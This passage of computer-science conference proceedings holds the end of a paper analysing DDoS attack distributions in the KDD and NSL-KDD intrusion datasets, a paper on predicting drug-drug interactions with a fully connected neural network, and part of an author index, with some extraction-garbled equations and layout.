classes such as apache2, back, land, Neptune, mailbomb, pod, processtable, Smurf,
teardrop, udpstorm, and worm. The summary of the datasets such as KDD and NSL-
KDD are provided as mentioned in Table 1. The same information can be visualized
as mentioned in Fig. 1.
From Fig. 1, one can understand the major proportion of any dataset is normal
activities and DDOS threats. So, it is necessary to study and identify the consequences
caused due to DDOS threats to the network as well as the various components in the
network. Consider the proportion of DDOS threats and normal activities distribution
in each of these datasets. In the case of KDD, dataset consists of 391,458 DDOs
threats were identified, and NSL-KDD dataset consists of 45,927 DDOs threats
were identified as mentioned in Table 1. The only distribution of DDOS and normal
activities in the NSL-KDD and KDD datasets is represented as mentioned in Fig. 2a,
b, respectively.
From Fig. 2, one can understand the dataset NSL-KDD was very smaller when
compared with all other datasets, whereas KDDT dataset was a larger dataset.
Analyzing the former dataset is not at all good for network related issues, whereas
analyzing the later dataset is not at all possible with MS Excel due to its larger size.
So, NSL-KDD data is medium in size and the recommendations can be generalized
for a network. The distribution of DDOS and normal activities according to protocols
as per the dataset NSL-KDD percent is represented as mentioned in Fig. 3.
Fig. 2 DDOS vs Normal activities distribution for NSL-KDD and KDD datasets
Fig. 4 The distribution of proportions of DDOS and normal activities in the KDD dataset
From Fig. 3, one can observe the distribution of DDOS and normal activities
across the protocols as per the dataset, NSL-KDD. The effect of DDOS threats can
be observed majorly in the case of TCP protocol followed by UDP, and finally the
least effect of DDOS in ICMP protocol. But these represent only the number of
cases in each of the protocols and the comparison would be more convenient when
we consider the proportion. The proportion is calculated as mentioned in Eq. (1).
where class represents DDOS and normal activities and protocol represents TCP,
UDP, and ICMP. The proportions will provide the effectiveness of a class (DDOS or
Normal) in a particular protocol. The distribution of those proportions is represented
as mentioned in Fig. 4.
On the contrary to the discussed effect of DDOS on the protocols, the DDOS
effect was stronger in the case of both the ICMP and TCP protocols. In the case
of UDP, still, DDOS effect is very low which implies that the UDP protocol is
way better than the other two protocols. Similarly, let us consider the scenario in
which the classes (DDOS and normal) affect each of the flags by considering the
proportions. The distribution of DDOS and normal activities as per the various flags
in NSL-KDD is represented as mentioned in Fig. 5. From Fig. 5, one can understand
that DDOS affect higher in the case of flags such as S0, RSTO, and REJ. S0 flag
represents that the connection attempt was identified, yet there is no reply. RSTO flag
represents Originator resetting the connection, and REJ flag represents connection
attempt rejected.
Recommendations for DDOS Attack-Based Intrusion … 907
Fig. 5 Distribution of DDOS and normal activities as per the various flags in NSL-KDD
3.2 Recommendations
4 Conclusion
The proposed framework mainly analyzed the KDD and NSL-KDD datasets to iden-
tify the influence of the DDOS attack on various aspects such as protocols, services,
and flags. The generalization would be more effective when the complete dataset is
considered. It would become a good and effective challenge for the big data scenario.
Due to these recommendations, the modeling of effective IDS based on DDOS attacks
can be framed. This analysis further can be continued for the effective recommen-
dations in very depth along with other classes of attacks such as the Probe attack,
R2L attack, and U2R attack. If able to identify the effective recommendations on all
these classes of attacks, then the most effective intrusion detection can be framed.
References
1. Ruan, Z., Miao, Y., Pan, L., Patterson, N., & Zhang, J. (2017). Visualization of big data security:
A case study on the KDD99 cup data set. Digital Communications and Networks, 3, 250–259.
2. Ji, H., Kim, D., Shin, D., & Shin, D. (2018). A study on comparison of KDD CUP 99 and NSL-
KDD using artificial neural network. Lecture Notes in Electrical Engineering, 474, 452–457.
3. Ibrahimi, K., & Ouaddane, M. (2017). Management of intrusion detection systems based-
KDD99: Analysis with LDA and PCA. In: International Conference on Wireless Networks and
Mobile Communications (WINCOM) 2017.
4. Othman, S. M., Ba-Alwi, F. M., Alsohybe, N. T., & Al-Hashida, A. Y. (2018). Intrusion detection
model using machine learning algorithm on Big Data environment. Journal of Big Data, 5.
Recommendations for DDOS Attack-Based Intrusion … 909
5. Jia, Y., Wang, M., & Wang, Y. (2019). Network intrusion detection algorithm based on deep
neural network. IET Information Security, 13, 48–53.
6. Anand Sukumar, J. V., Pranav, I., Neetish, M. M., & Narayanan, J. (2018). Network intrusion
detection using improved genetic k-means algorithm. In: 2018 International Conference on
Advances in Computing, Communications and Informatics (ICACCI), (pp. 2441–2446).
7. Basnet, R. B., Shash, R., Johnson, C., Walgren, L., & Doleck, T. (2019). Towards detecting
and classifying network intrusion traffic using deep learning frameworks. Journal of Internet
Services and Information Security, 9, 1–17.
8. Kumar, V., Das, A. K., & Sinha, D. (2019). UIDS: A unified intrusion detection system for IoT
environment. Evolutionary Intelligence.
9. Khonde, S., & Ulagamuthalvi, V. (209). Fusion of feature selection and random forest for
an anomaly-based intrusion detection system. Journal of Computational and Theoretical
Nanoscience, 16(209), 3603–3607.
10. Pawlicki, M., Choraś, M., & Kozik, R. (2020). Defending network intrusion detection systems
against adversarial evasion attacks. Future Generation Computer Systems, 110, 148–154.
11. Ji, Y., & Li, X. (2020). An efficient intrusion detection model based on deep FM. In Proceedings
on 2020 IEEE 4th Information Technology, Networking, Electronic and Automation Control
Conference ITNEC 2020 (pp. 778–783).
12. Su, T., Sun, H., Zhu, J., Wang, S., & Li, Y. (2020). BAT: Deep learning methods on network
intrusion detection using NSL-KDD dataset. IEEE Access, 8, 29575–29585.
13. Abrar, I., Ayub, Z., Masoodi, F., & Bamhdi, A. M. (2020). A machine learning approach for
intrusion detection system on NSL-KDD dataset (pp. 919–924).
14. Gao, X., Shan, C., Hu, C., Niu, Z., & Liu, Z. (2019). An adaptive ensemble machine learning
model for intrusion detection. IEEE Access, 7, 82512–82521.
15. Aljawarneh, S., Aldwairi, M., & Yassein, M. B. (2018). Anomaly-based intrusion detection
system through feature selection analysis and building hybrid efficient model. Journal of
Computer Science, 25(2018), 152–160.
16. Bhattacharjee, P. S., Fujail, A. K. M., & Begum, S. A. (2017). Intrusion detection system for
NSL-KDD data set using vectorised fitness function in genetic algorithm. The Advances in
Computational Sciences and Technology, 10(2017), 235–246.
17. Pande S., Khamparia A., Gupta D., & Thanh D. N. H. (2021) DDOS Detection using machine
learning technique. In A. Khanna, A. K. Singh, & A. Swaroop (Eds.), Recent studies on compu-
tational intelligence. Studies in computational intelligence (Vol. 921). Springer. https://doi.org/
10.1007/978-981-15-8469-5_5
18. Pande, S. D., & Khamparia, A. (2019). A review on detection of DDOS attack using machine
learning and deep learning techniques. Think India Journal, 2035–2043.
19. Pande, S., & Gadicha, A. B. (2015). Prevention mechanism on DDOS attacks by using multi-
level filtering of distributed firewalls. International Journal on Recent and Innovation Trends
in Computing and Communication, 3(3). ISSN: 2321-8169.
Drug-Drug Interaction Prediction Based
on Drug Similarity Matrix Using a Fully
Connected Neural Network
Abstract Drug-drug interactions (DDIs) are a major hindrance in providing safe and
inexpensive health care. It generally occurs for patients under extensive medication,
leading them to take multiple drugs at a time. DDI can cause side effects leading from
mild to severe health issues among the patients. This leads to reduce patients’ quality
of life and leads to an increase in hospital healthcare expenses by increasing their
recovery period. To resolve this problem, many efforts have been made to develop
new techniques for DDI prediction. In this article, we propose a method of predicting
DDI based on the similarity of drugs which includes chemical similarity, distance-
based similarity, side effects, ligand similarity, etc., using a fully connected neural
network model. Our model was able to achieve a competitive AUC score ranging
from 0.72 to 0.77 and PR AUC from 0.68 to 0.73 when tested on three gold standard
dataset in k-fold cross-validation.
1 Introduction
Combining multiple drugs to treat severe diseases like cancer, AIDS, etc., is becoming
a promising and common approach in the modern era. The main reason behind using
multiple drugs to treat a disease is that it increases the treatment process’s efficacy,
and different drugs can tackle a different part of the treatment process [1]. However,
these combinations may result in unwanted interactions between the drugs, which can
cause adverse drug reactions [2]. Hence, the importance of predicting DDIs in human
health is immense [3]. Researchers and organizations worldwide have spent ample
A. Kumar
Goibibo Private Limited, Bangalore, India
M. Sharma (B)
Maharaja Agrasen Institute of Technology, Delhi, India
e-mail: moolchand@mait.ac.in
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 911
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_74
912 A. Kumar and M. Sharma
time and money to find DDI pairs using several In Vivo and In Vitro experimental
techniques [4]. The experimental method for determining DDI is extremely slow, thus
requiring a lot of time and money. These methods usually result in low throughput,
due to which some interactions may go unnoticed. As these procedures are extremely
slow and expensive, they are not feasible for finding large combinations of drugs.
Numerous new techniques for predicting DDI have come into the picture over the
decade to get over this problem.
Vilar et al. propose a protocol for predicting novel DDIs based on candidates’
similarity with the known DDIs [5]. A method to predict DDI by using model inter-
action profile fingerprints was proposed by Vilar et al. [6]. A small pool of 928 drugs
was considered in this approach, and their interaction profile fingerprints (IPFs) were
calculated. Then, a similarity matrix corresponding to the IPFs was generated using
the Jaccard index. To calculate predicted interactions established, DDI matrix was
multiplied with a similarity matrix.
Gottlieb et al. present a method to predict DDI considering the structural similarity
and side effects of known drug pairs [7]. Lee et al. propose a model to predict DDI
using a feed-forward deep neural network that takes reduced similarity profiles gener-
ated from autoencoders as input [8]. Cheng et al. created drug-drug similarity pairs
based on multiple features and applied five predictive models based on naive Bayes,
decision tree, k-nearest neighbor, logistic regression, and support vector machine
[9]. Zhang et al. proposed a method for finding DDI by applying a label propaga-
tion algorithm on a network of structural and side effect similarity of drugs [10].
A dependency-based convolutional neural network (DCNN) for predicting DDI is
proposed by Liu et al. [11]. In this model, DCNN was used to extract DDIs in short
sentences, and CNN-based model was implemented to extract DDIs in long distances
since most dependency-based parsers work well only for short sentences. A recur-
sive neural network-based model has been proposed by Lim et al. for predicting
DDIs [12]. The model uses a position feature, a subtree containment feature, and
an ensemble method to perform DDI extraction. In our model, we have proposed a
neural network-based model.
We have proposed a model made of a fully connected neural network to predict
this. Our model uses a similarity matrix as input for predicting the interaction proba-
bility proposed by Olayan [13]. He proposes a heuristic process to obtain an optimized
combination of similarities from the similarity set. The similarity matrix is made by
applying the heuristic algorithm on multiple similarities features like a side effect,
offside effect, pathway, ligand-based similarity, etc., to remove redundancy and find
the most optimal similarity subset. The subset obtained after this step is combined
to generate an integrated similarity matrix of m*m, where m is the number of drugs
taken into account. This combination was performed using the method of similarity
network fusion (SNF) [14]. This method constructs data samples’ networks for each
available data type and then combines them into a single network that represents the
complete spectrum of the given data type. Once the integrated similarity matrix is
generated, we feed it into our dense neural network. The network is very straightfor-
ward and simple, consisting of an input layer made up of 64 neurons—two hidden
Drug-Drug Interaction Prediction Based on Drug … 913
layers and an output layer containing two neurons for providing a binary output.
Details of the structure and working of the model are discussed in a later section.
We trained and tested our model on three gold standard datasets used in numerous
research works [7, 15–17]. Our model achieved a competitive AUC score ranging
from 0.72 to 0.77 and AUPR score from 0.68 to 0.73.
The key highlight of the paper includes:
• The following paper helps identify interactions between different kinds of drugs
during the process of multidrug treatment of a patient.
• A method to generate and combine similarity matrices of different drug features
has been discussed in this chapter.
• A four-layered neural network model has been proposed for predicting the
interaction probability of drugs.
• The model has achieved an AUC score ranging from 0.72 to 0.77 on three gold
standard datasets (DS1, DS2, DS3).
2 Dataset
To train and evaluate the performance of our model, we used three standard datasets.
These datasets contain a known DDI interaction matrix along with multiple other
Jaccard similarity matrices. The dataset used by us in this article has been taken
from [17]. The first dataset (DS1) consists of 548 drugs, and their interactions are
represented in a n*n matrix having a diagonal element as zero as the interaction of a
drug with itself is not taken into account. The dataset consists of similarity matrices
based on eight different characteristics (chemical similarity data, target data, enzyme
data, transporter data, pathway data, indication data, and side effect data).
The second dataset (DS2) consists of 707 drugs and their interaction matrices.
In total, this dataset contains 34,412 interactions. Unlike DS1, this dataset only has
interactions based on chemical similarity. The third dataset (DS3) consists of 807
drugs, and their interactions are represented in the form of interaction matrices.
This dataset consists of seven types of similarity matrices. Four of these similarities
are based on the anatomical therapeutic chemical (ATC) classification. The other
similarity matrices are based on chemical similarity, ligand-based similarity, and
side effects matrix. Gottlieb et al. have shown a general procedure for assembling
and validating these datasets [7].
The datasets discussed above are created using data extracted from the following
sources.
914 A. Kumar and M. Sharma
3 Methodology
This article has proposed a model for predicting DDI using a deep neural network,
taking an integrated similarity vector as input. Creating an integrated similarity matrix
has already been used in previous research works [13, 14]. A heuristic approach for
generating a subset of similarity matrices is proposed by Olayan, which takes care of
redundant data to generate the most optimal subset [13]. Then, the similarity network
fusion(SNF) [14] is applied to the subset to generate data sample networks combined
into a single network for generating an integrated similarity matrix. The vector of
similarity matrix and know interactions was provided as input for our fully connected
neural network. Our network consists of one input layer made of 64 neurons, and
an output layer made up of two neurons for generating binary output, and two fully
connected hidden layers connected sequentially. A dropout of 0.5 was applied in the
hidden layer to prevent overfitting. We used the relu activation function in all layers
except in the output layer, in which case the sigmoid activation function was used for
generating binary output. Our model used binary_crossentropy as the loss function
and adam as the optimizer. The model was trained on the DS1 dataset with a standard
test-train split of 70 and 30%. We found that our model gave better results during our
training process when trained on an integrated similarity matrix compared to when
trained just on chemical similarity. The hyperparameters of the model were tuned
Drug-Drug Interaction Prediction Based on Drug … 915
using tenfold cross-validation. The model’s summary and architecture are provided
in Table 1 and Fig. 1, respectively.
4 Evaluation
Our model was trained on the DS1 dataset, which contains information on eight
different interactions. Our model was evaluated on four different evaluation metrics
(Area under the receiver operating characteristic curve (ROC AUC), Area under
the precision-recall curve (PR AUC). ROC [23] curve is generated by plotting true
positive rate (Tpr) against false positive rate (Fpr) is given below in Eqs. (1) and (2).
Equation (1) (Tpr) and Eq. (2) (Fpr)
Tp
Tpr = (1)
Tp + Fn
and
Fp
Fpr = (2)
Fp + Tn
Tp
Precision = (3)
Tp + Fp
and
Tp
Recall = (4)
Tp + Tn
In the experiment, we set the termination condition was set based on the AUC value.
We stopped the experiment once the AUC value peaked for our training dataset.
The DS1 dataset was chosen for training the model as it was the most wholesome,
containing similarity matrices based on eight different characteristics. To minimize
the chances of getting incurrate prediction scores, we tested our model on completely
different datasets than the one on which it was trained. We achieve this by performing
a test-train split of the DS1 dataset and introducing two new datasets DS2 and DS3.
Our result gave an AUC score of 0.75 for the test split of the DS1 dataset. This score
Drug-Drug Interaction Prediction Based on Drug … 917
Table 2 Performance
Dataset ROC AUC PR AUC
evaluation of the model on
different datasets DS1 0.75 0.73
DS2 0.72 0.70
DS3 0.77 0.68
rose to 0.77 for the test dataset DS3 and shown a slit dip to 0.72 for DS2, whereas
the PR AUC score ranged from 0.68 to 0.73. These results are shown in Table 2 and
represented as a bar graph in Fig. 2.
References
1. Lucy, D., Roberts, E. O., Corp, N., & Kadam, U. T. (2014). Multi-drug therapy in chronic
condition multimorbidity: A systematic review. Family Practice, 31(6), 654–663. https://doi.
org/10.1093/fampra/cmu056
2. Edwards, I. R., & Aronson, J. K. (2000). Adverse drug reactions: Definitions, diagnosis,
and management. Lancet, 356(9237), 1255–1259. https://doi.org/10.1016/S0140-6736(00)027
99-9 PMID: 11072960.
3. Palleria, C., Di Paolo, A., Giofrè, C., Caglioti, C., Leuzzi, G., Siniscalchi, A., & Gallelli, L.
(2013). Pharmacokinetic drug-drug interaction and their implication in clinical management.
Journal of Research in Medical Sciences: The Official Journal of Isfahan University of Medical
Sciences, 18(7), 601.
4. Boulenc X., Schmider W., Barberan O. (2011). In Vitro/in vivo correlation for drug-drug
interactions. In H. G. Vogel, J. Maas, A. Gebauer (Eds.), Drug discovery and evaluation:
Methods in clinical pharmacology. Springer. https://doi.org/10.1007/978-3-540-89891-7_14.
5. Vilar, S., Uriarte, E., Santana, L., Lorberbaum, T., Hripcsak, G., Friedman, C., & Tatonetti,
N. P. (2014). Similarity-based modelling in large-scale prediction of drug-drug interactions.
Nature Protocols, 9(9), 2147–2163. https://doi.org/10.1038/nprot.2014.151
6. Vilar, S., Uriarte, E., Santana, L., Tatonetti, N. P., & Friedman, C. (2013). Detection of drug-drug
interactions by modelling interaction profile fingerprints. PLoS ONE, 8(3), e58321.
7. Gottlieb, A., Stein, G. Y., Oron, Y., Ruppin, E., & Sharan, R. (2012). INDI: A computational
framework for inferring drug interactions and their associated recommendations. Molecular
System Biology, 8(1), 592.
8. Lee, G., Park, C., & Ahn, J. (2019). Novel deep learning model for more accurate prediction of
drug-drug interaction effects. BMC Bioinformatics, 20, 415. https://doi.org/10.1186/s12859-
019-3013-0
9. Cheng, F., Zhao, Z. (2014). Machine learning-based prediction of drug-drug interactions by
integrating drug phenotypic, therapeutic, chemical, and genomic properties. Journal of Amer-
ican Medical Information Association 21(e2), e278-86. https://doi.org/10.1136/amiajnl-2013-
002512. Epub 2014 Mar 18. PMID: 24644270; PMCID: PMC4173180.
10. Zhang, P., Wang, F., Hu, J., et al. (2015). Label propagation prediction of drug-drug interactions
based on clinical side effects. Science Report, 5, 12339. https://doi.org/10.1038/srep12339
11. Liu, S., Chen, Kai., Chen, Q., & Tang, B. (2016). Dependency-based convolutional neural
network for drug-drug interaction extraction. In 2016 IEEE International Conference on Bioin-
formatics and Biomedicine (BIBM) (pp. 1074-1080). https://doi.org/10.1109/BIBM.2016.782
2671.
12. Lim, S., Lee, K., & Kang, J. (2018). Drug-drug interaction extraction from the literature using
a recursive neural network. PLoS ONE, 13(1), e0190926. https://doi.org/10.1371/journal.pone.
0190926
13. Olayan. R.S., Ashoor, H., & Bajic, V.B. (2018). DDR: Efficient computational method to predict
drug-target interactions using graph mining and machine learning approaches. Bioinformatics
34(7), 1164–1173. https://doi.org/10.1093/bioinformatics/btx731. Erratum in: Bioinformatics.
2018 Nov 1; 34(21), 3779. PMID: 29186331; PMCID: PMC5998943.
14. Wang, B., Mezlini, A. M., Demir, F., Fiume, M., Tu, Z., Brudno, M., Haibe-Kains, B., &
Goldenberg, A. (2014). Similarity network fusion for aggregating data types on a genomic
scale. Natural Methods, 11(3), 333–337. https://doi.org/10.1038/nmeth.2810 Epub 2014 Jan
26 PMID: 24464287.
15. Zhang, W., et al. (2017). Predicting potential drug-drug interactions by integrating chemical,
biological, phenotypic and network data. BMC Bioinformatics, 18, 18.
16. Wan, F., Hong, L., Xiao, A., Jiang, T. & Zeng, J. (2018). Neodti: Neural integration of neigh-
bour information from a heterogeneous network for discovering new drug-target interactions.
bioRxiv 261396.
17. Rohani, N., & Eslahchi, C. (2019). Drug-drug interaction predicting by neural network using
integrated similarity. Science Report, 9, 13645. https://doi.org/10.1038/s41598-019-50121-3
Drug-Drug Interaction Prediction Based on Drug … 919
18. Wishart, D. S., Knox, C., Guo, A. C., Cheng, D., Shrivastava, S., Tzur, D., Gautam, B.,
& Hassanali, M. (2008). DrugBank: A knowledgebase for drugs, drug actions and drug
targets. Nucleic Acids Research, 36(Database issue), D901–D906, https://doi.org/10.1093/nar/
gkm958
19. Kanehisa, M., & Goto, S. (2000). KEGG: Kyoto encyclopedia of genes and genomes. Nucleic
Acids Research, 28(1), 27–30. https://doi.org/10.1093/nar/28.1.27
20. Tatonetti, N. P., Ye, P. P., Daneshjou, R., & Altman, R. B. (2012) Data-driven prediction of
drug effects and interactions. Science Translational Medicine 4(125):125ra31. https://doi.org/
10.1126/scitranslmed.3003377.
21. Kim, S., Thiessen, P. A., Cheng, T., Yu, B., Shoemaker, B. A., Wang, J., Bolton, E. E., Wang, Y.,
& Bryant, S. H. (2016). Literature information in PubChem: associations between PubChem
records and scientific articles. Journal of Cheminformatics, 8, 32. https://doi.org/10.1186/s13
321-016-0142-6
22. Kuhn, M., & Letunic, I. (2016). Lars Juhl Jensen, Peer Bork, The SIDER database of drugs
and side effects. Nucleic Acids Research, 44(D1), D1075–D1079. https://doi.org/10.1093/nar/
gkv1075
23. Hajian-Tilaki, K. (2013). Receiver operating characteristic (ROC) curve analysis for medical
diagnostic test evaluation. Caspian Journal of Internal Medicine, 4(2), 627–635.
Author Index
F
B Fraz, Mohammad, 757
Bachate, Ravindra P., 665
Bahadur, Promila, 693, 857
Bhatia, Anshul, 509 G
Bhatia, Rajesh, 291 Garg, Amit Kumar, 645
Bhatt, Arvind Kumar, 1 Garg, Preeti, 315
Bhavani, Dokuparthi Sai Santhoshi, 839 Garg, Srishti, 857
Biradar, Rajashree V., 279 Gazi, Mohammad Danish, 301
Biswas, Sarmista, 423 Goel, Gaurav, 499
Gosain, Anjana, 85, 769
Gourisaria, Mahendra Kumar, 721, 735
C Goyal, S. B., 59
Chakraborty, Sudeshna, 817 Gupta, Arun, 581
Chandra, Girish, 471 Gupta, Ashish, 301
Chandra, Satish, 721 Gupta, Deepak, 899
Chaudhary, Juhi, 409 Gupta, Mayuri, 829
Chauhan, Bhargavi K., 15 Gupta, Megha, 31
Chauhan, Jaisal, 261 Gupta, Mukesh Kumar, 183
Choudhary, Ankur, 605 Gupta, Pallavi, 301
© The Editor(s) (if applicable) and The Author(s), under exclusive license 921
to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1
922 Author Index
J P
Jacob, Lija, 271 Pande, Sagar, 899
Jain, Shikha, 369 Pandey, Mahima Shanker, 461
Jain, Tanvi, 393 Pandey, Pratibha, 683
Jindal, Rajni, 435 Patel, Dhirenbhai B., 15
Patil, Shashikant, 535
Prabha, Rachna, 683
Prakash, Shiv, 521
K
Pramanik, Rwittika, 735
Kamparia, Aditya, 899
Priyadarshini, Sushree Bibhuprada B., 383,
Kandhoul, Nisha, 127
617
Kashyap, Parul, 341
Kaushik, Vandana Dixit, 247
Khamparia, Aditya, 889
R
Khanna, Ashish, 711
Raghav, S., 49
Khare, Sandali, 735
Rai, Saloni, 645
Khatri, Megha, 169
Rajoriya, Manisha, 301
Kirti, 355
Rajpal, Navin, 355, 369
Koundal, Deepika, 449
Ramachandra, H. V., 49
Krishna, C. Rama, 67
Rama Kishore, R., 31, 315
Kumar, Akshi, 869 Rani, Asha, 879
Kumar, Alok, 911 Rani, Poonam, 93
Kumar, Gaurav, 793 Rani, Sita, 569
Kumar, K. S. Raghu, 279 Rathkanthiwar, Shubhangi, 535
Kumar, Shivam, 817 Ravinder, M., 633
Kumar, Sumit, 499 Reddy, Kandula Balagangadhar, 271
Kurumbanshi, Suresh, 535 Reddy, S. Hareesh, 169
Rishabh, 779
Roy, Ritwik, 749
L
Lutimath, Nagaraj M., 49
S
Sachdeva, Nitin, 869
M Sachdeva, Ravi Kumar, 147
Madan, Kapil, 291 Saha, Anju, 85
Malhotra, Anshu, 435 Sharan, Mudita, 633
Malhotra, Radhika, 1 Sharma, Abhishek, 817
Mangla, Aakash, 237 Sharma, Ashok, 665
Maurya, Archana Sachindeo, 693, 857 Sharma, Megha, 581
Mehta, Purnima Lala, 481 Sharma, Moolchand, 911
Mishra, Anukram, 581 Sharma, Neha, 49
Mishra, Debahuti, 383 Sharma, Priya, 139
Mishra, Prateek, 147 Sharma, Sanjay Kumar, 139
Mittal, Dhruv, 749 Shetty, Mangala, 675
Mittal, Namita, 581 Shetty, Spoorthi, 675
Mohanty, Maitri, 711 Shinde, Swati V., 157
Mohapatra, Ambarish G., 711 Shivani, 67
Author Index 923
T
Tamilarasan, B., 329 Z
Taruna, 779 Zaza, Gianluca, 807